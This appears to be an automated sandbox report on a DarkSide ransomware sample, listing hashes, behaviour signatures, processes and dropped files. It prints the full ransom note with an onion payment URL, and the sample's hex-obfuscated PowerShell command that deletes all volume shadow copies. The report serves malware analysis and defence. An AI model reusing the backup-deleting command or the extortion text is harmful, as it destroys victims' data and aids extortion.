Overview

overview

10

Static

static

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

7

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

9

Ransomware...KB.exe

windows10-ltsc_2021-x64

9

Ransomware...KB.ps1

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.msi

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Resubmissions

31/03/2025, 00:22

250331-apdw1ssjs8 10

28/03/2025, 22:52

250328-2tfd7avl15 10

25/03/2025, 14:57

250325-sb3mbsxxht 10

Analysis

  • max time kernel
    488s
  • max time network
    487s
  • platform
    windows10-ltsc_2021_x64
  • resource
    win10ltsc2021-20250314-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
  • submitted
    31/03/2025, 00:22

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    RansomwareSamples/DarkSide_16_01_2021_59KB.exe

  • Size

    59KB

  • MD5

    0ed51a595631e9b4d60896ab5573332f

  • SHA1

    7ae73b5e1622049380c9b615ce3b7f636665584b

  • SHA256

    243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60

  • SHA512

    9bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5

  • SSDEEP

    768:vjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1yl3RYY23W58:0x7Fu4/ihrhDTV1ylhZ58

Score
10/10
darksidecredential_accessdiscoveryexecutionransomwarespywarestealer

Malware Config

Extracted

Path

C:\Recovery\WindowsRE\README.9a401f55.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW When you open our website, put the following data in the input form: Key: 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    ransomwaredarkside
  • Darkside family
    darkside
  • Renames multiple (151) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 1 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 7 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of FindShellTrayWindow 43 IoCs
  • Suspicious use of SendNotifyMessage 42 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe
    "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • System Location Discovery: System Language Discovery
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2444
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2352
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1876
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.9a401f55.TXT
    1⤵
    • Opens file in notepad (likely ransom note)
    • Suspicious use of FindShellTrayWindow
    PID:4212
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:116
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\CompleteProtect.svg.txt
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:3592
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /7
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:5848
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:5196
    • C:\Windows\SysWOW64\DllHost.exe
      C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
      1⤵
      • System Location Discovery: System Language Discovery
      PID:5756
    • C:\Windows\SysWOW64\DllHost.exe
      C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
      1⤵
      • System Location Discovery: System Language Discovery
      PID:1156
    • C:\Windows\System32\CastSrv.exe
      C:\Windows\System32\CastSrv.exe CCastServerControlInteractiveUser -Embedding
      1⤵
      • Modifies registry class
      PID:1496
    • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
      C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
      1⤵
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      PID:1052
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
      1⤵
        PID:4004
      • C:\Windows\system32\AUDIODG.EXE
        C:\Windows\system32\AUDIODG.EXE 0x4b4 0x324
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4920
      • C:\Windows\system32\SystemSettingsAdminFlows.exe
        "C:\Windows\system32\SystemSettingsAdminFlows.exe" TurnOffDevicePortal
        1⤵
          PID:5060
        • C:\Windows\system32\SystemSettingsAdminFlows.exe
          "C:\Windows\system32\SystemSettingsAdminFlows.exe" TurnOffDevicePortal
          1⤵
            PID:4100
          • C:\Windows\system32\SystemSettingsAdminFlows.exe
            "C:\Windows\system32\SystemSettingsAdminFlows.exe" FeaturedResetPC
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:4916
          • C:\Windows\system32\LogonUI.exe
            "LogonUI.exe" /flags:0x4 /state0:0xa398a055 /state1:0x41c64e6d
            1⤵
            • Modifies data under HKEY_USERS
            • Suspicious use of SetWindowsHookEx
            PID:5688
          • C:\Windows\system32\bootim.exe
            bootim.exe /startpage:1
            1⤵
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            PID:2376

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Recovery\WindowsRE\README.9a401f55.TXT
            Filesize

            1KB

            MD5

            d4e176b40c4ea17f4870c34fad926d6e

            SHA1

            2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0

            SHA256

            7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c

            SHA512

            feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            3KB

            MD5

            4521e67a3b03b060fde700c36d3b9297

            SHA1

            4a730cd86dc7a57ac001d59853dd500c1b83b4ab

            SHA256

            a72aa223a84c4fa011c8a2b0ef2475a83d5123de2cdfa6a7160231729e68383d

            SHA512

            90235850eef71c2f0921d04e6990147af9e76fec8ee49e12e6a5bab065ff0e63331a54be845026f17a7b1dd230ee94843099db4813c127c6bafb8cbaf59b753f

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            75c7d4a084b3113fb3aeac7d33a681c6

            SHA1

            689bbd08e3bbb66ada48dcac1b767c673d33f6c0

            SHA256

            355e7f6e3e8d956e6d33ddd6f0bb7bd9b2c81eaf7ed99e74145b2d3f65a6977d

            SHA512

            e1a9340e40d402fe493c7642348db22c6721a43f75822871e82abc34fdd09350dd301097202ae1eb4a39b2d8fb7a3a270617978170389860a74bc1b6ea9199c8

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zhzz4v5a.egf.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\Desktop\CompleteProtect.svg.txt
            Filesize

            625KB

            MD5

            63e6df8afefc85f644bb27bd3fc47b63

            SHA1

            9538028935d56397adad6893bbcd99285e480039

            SHA256

            9ef580e129104e99d400b722d44d07ff614bbb4a1028e26e94cfe87bb6c13ce5

            SHA512

            72ee70d52d749ead1e7e0019481b1e49c542d916c4e8f13be3b1dab0e7b19977473eebacdd04b0a69817d58056ec2049b48bfdf0abacab3008a409c40115454a

            Download Submit

          • memory/2352-14-0x00007FF9FBE40000-0x00007FF9FC902000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2352-17-0x00007FF9FBE40000-0x00007FF9FC902000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2352-1-0x00007FF9FBE43000-0x00007FF9FBE45000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2352-13-0x00007FF9FBE40000-0x00007FF9FC902000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2352-12-0x00007FF9FBE40000-0x00007FF9FC902000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2352-2-0x000001667C330000-0x000001667C352000-memory.dmp

            Filesize

            136KB

            Download

          • memory/5848-200-0x000001F2034E0000-0x000001F2034E1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5848-199-0x000001F2034E0000-0x000001F2034E1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5848-201-0x000001F2034E0000-0x000001F2034E1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5848-205-0x000001F2034E0000-0x000001F2034E1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5848-211-0x000001F2034E0000-0x000001F2034E1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5848-210-0x000001F2034E0000-0x000001F2034E1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5848-209-0x000001F2034E0000-0x000001F2034E1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5848-208-0x000001F2034E0000-0x000001F2034E1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5848-207-0x000001F2034E0000-0x000001F2034E1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/5848-206-0x000001F2034E0000-0x000001F2034E1000-memory.dmp

            Filesize

            4KB

            Download